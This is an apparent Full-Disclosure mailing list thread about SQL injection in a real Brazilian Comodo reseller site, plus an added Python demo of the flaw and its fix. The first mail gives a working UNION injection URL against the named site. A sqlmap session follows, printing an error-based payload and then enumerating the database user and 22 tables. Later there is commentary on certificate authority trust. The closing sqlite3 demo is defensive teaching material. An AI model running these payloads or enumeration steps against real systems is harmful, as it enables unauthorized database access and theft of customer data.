Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP; Sun, 22 May 2011 11:20:54 PDT
X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg
X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
Cc: suporte@comodobr.com
Subject: [Full-disclosure] comodobr.com sqli

vulnerable link:
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -

http://pastebin.com/9qwdL1pA

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

---------------------------------------------------------------------

PS C:\Python27> nslookup 199.48.147.35
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

Name:    tor-exit-router35-readme.formlessnetworking.net
Address:  199.48.147.35

>>> You're not going to find him... <<<

>>> Let's check the host: <<<

PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:00:00

Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prod
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---

[21:00:00] [INFO] retrieved: 5.0.91-community-log
web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner:    '5.0.91-community-log'
[21:00:00] [INFO] retrieved: comodobr_site@localhost
current user:    'comodobr_site@localhost'
[21:00:00] [INFO] retrieved: comodobr_comodobr
current database:    'comodobr_comodobr'
current user is DBA:    'False'

[*] shutting down at: 21:00:00

PS C:\Python27>

>>> Looks real <<<

>>> Let's see the inside of the db: <<<

web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner:    '5.0.91-community-log'
current user:    'comodobr_site@localhost'
current database:    'comodobr_comodobr'
current user is DBA:    'False'
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_associa
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_categoria
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_importado
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_confirm_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_contab
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_expected_delivery_time
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_hosting_contas
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_meios_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status_codes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos_historico
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prod_grupos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prods
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_resellers
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_server_software
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_users
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_item
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
Database: comodobr_comodobr
[22 tables]
+-------------------------------+
| comodo_boleto                 |
| comodo_boleto_associa         |
| comodo_boleto_categoria       |
| comodo_boleto_importado       |
| comodo_boleto_status          |
| comodo_confirm_pago           |
| comodo_contab                 |
| comodo_expected_delivery_time |
| comodo_hosting_contas         |
| comodo_meios_pago             |
| comodo_pedido_status          |
| comodo_pedido_status_codes    |
| comodo_pedidos                |
| comodo_pedidos_historico      |
| comodo_prod_grupos            |
| comodo_prods                  |
| comodo_resellers              |
| comodo_server_software        |
| comodo_users                  |
| comodo_vw_crm_clientes        |
| comodo_webhostreport_item     |
| comodo_webhostreport_subitem  |
+-------------------------------+

[*] shutting down at: 21:00:00

PS C:\Python27>

When are Comodo going to fix this? How come Comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from PayPal, Google, etc.? Why does Firefox restore all my CAs when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next? GET YOUR SHIT TOGETHER.

EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles

I've just checked his claims, which were true. Everyone can claim that they hacked Comodo, but that the vulnerability was fixed, so all I have done is open sqlmap and test :-)

Also here's a new response:

Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP; Tue, 24 May 2011 14:58:39 PDT
X-Mailer: YahooMailWebService/0.8.111.303096
Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg
Cc: "support@comodobr.com"
Subject: [Full-disclosure] My comments on comodobr.com

I have to agree with Comodo president and CEO, Melih Abdulhayoglu. In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli. However, the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten up their own security. Further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.

Just my 50 cents

[Edit] The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSRs and client info shouldn't be "readily available" like this.

No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own. That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
http://pastebin.com/MFSUdCnk

_______________________________________________
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/

PS C:\Users\Nicolai> nslookup 199.48.147.35
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

Name:    tor-exit-router35-readme.formlessnetworking.net
Address:  199.48.147.35

PS C:\Users\Nicolai>
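The link in the first mail appends "UNION ALL SELECT 0,1,...,14 -- -" to the prod parameter, which only works because the parameter value is pasted into the SQL text and because the attacker pads the UNION to the column count of the original query (the 0..14 padding tells you that query selected 15 columns). The script below is an added illustration of that mechanism, not the comodobr.com code or anything from the pastebin: it uses sqlite3 instead of MySQL, a constructed 3-column product table (so the UNION needs 3 values rather than 15) and a constructed user table, and shows the string-concatenated lookup leaking the second table next to a validated, parameterized lookup that rejects the same payload. The error-based payload sqlmap chose (the FLOOR(RAND(0)*2) GROUP BY trick) is MySQL-specific and is not reproduced here.

```python
"""Toy reproduction of a numeric-parameter UNION injection with sqlite3.

Added illustration, not the site's code. The real application was PHP on
MySQL and its query selected 15 columns; the products table here has 3, so
the UNION is padded to 3. Table names, column names and rows are constructed.
"""
import sqlite3


def build_db():
    """Constructed sample schema: a product table a shop page reads, and an
    account table an attacker would like to read through the same query."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE comodo_prods (prod INTEGER, name TEXT, price REAL);
        INSERT INTO comodo_prods VALUES (8, 'Code Signing Certificate', 179.0);
        INSERT INTO comodo_prods VALUES (9, 'SSL Certificate', 49.0);
        CREATE TABLE comodo_users (id INTEGER, login TEXT, passwd TEXT);
        INSERT INTO comodo_users VALUES (1, 'admin', 'hunter2');
        INSERT INTO comodo_users VALUES (2, 'reseller', 's3cret');
        """
    )
    return conn


def lookup_vulnerable(conn, prod):
    """The bug: the raw query-string value becomes part of the SQL text.
    Assumed shape of the lookup behind compra_codesigning.php?prod=...;
    the PHP source itself is not on the page."""
    sql = "SELECT prod, name, price FROM comodo_prods WHERE prod = " + prod
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, prod):
    """Hardened form: the value is validated as an integer and bound as a
    placeholder, so its text can never be parsed as SQL."""
    try:
        prod_id = int(prod)
    except (TypeError, ValueError):
        raise ValueError("prod must be an integer")
    sql = "SELECT prod, name, price FROM comodo_prods WHERE prod = ?"
    return conn.execute(sql, (prod_id,)).fetchall()


# Same shape as the link in the first mail, padded to this table's 3 columns
# instead of the real site's 15. Note it contains no quote character.
PAYLOAD = "8 UNION ALL SELECT id, login, passwd FROM comodo_users -- -"


def demo():
    """Run both lookups against the payload and a benign value."""
    conn = build_db()
    leaked = lookup_vulnerable(conn, PAYLOAD)   # product row plus both user rows
    try:
        lookup_fixed(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True                            # payload never reaches the DB
    normal = lookup_fixed(conn, "8")              # the legitimate lookup still works
    return leaked, blocked, normal


if __name__ == "__main__":
    leaked, blocked, normal = demo()
    for row in leaked:
        print("vulnerable:", row)
    print("fixed rejected payload:", blocked)
    print("fixed normal lookup:", normal)
```

Two points worth taking from it: the payload contains no quote character, so escaping quotes (the usual mysql_real_escape_string reflex in PHP code of that era) would not have stopped it, because the parameter sits in an unquoted numeric context; and the attacker does not need to know the target tables up front, since on MySQL 5.0 information_schema (which sqlmap's payload above already reads) lists them, which is exactly how the 22-table listing was obtained.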